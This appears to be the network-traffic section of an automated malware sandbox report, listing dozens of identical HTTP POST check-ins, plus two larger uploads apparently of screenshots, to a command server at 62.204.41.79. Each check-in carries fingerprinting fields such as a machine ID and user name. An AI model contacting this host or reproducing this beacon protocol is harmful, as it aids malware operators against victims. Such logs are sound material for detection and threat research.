                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
